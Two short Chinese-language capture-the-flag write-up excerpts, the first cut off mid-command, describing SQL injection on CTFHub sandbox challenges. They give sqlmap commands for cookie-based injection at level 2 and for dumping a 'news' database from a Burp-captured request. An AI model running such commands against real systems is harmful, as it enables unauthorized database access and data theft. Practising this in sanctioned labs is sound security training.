注入,此次为cookie注入,cookie注入时需要设置level至少为2,不然无法成功注入 查数据库 sqlmap -u"http://challenge-3f19d183e8000da5.sandbox.ctfhub.com:10800/"--cookie"id=1;hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F"--level2--current-db (sqli) 查表 sqlmap -u"http://ch...
打开环境后发现是这样一个页面 考虑到xss或者sql注入,尝试了alert无果,便试试sql注入,随便输入aaa后使用burp抓包将这些保存在1.txt里,用sqlmap抓包,命令:sqlmap.py -r1.txt --dbs 这里看到一个news,在继续,命令:sqlmap.py -r1.txt -D news --dump 最后就得到flag啦!!!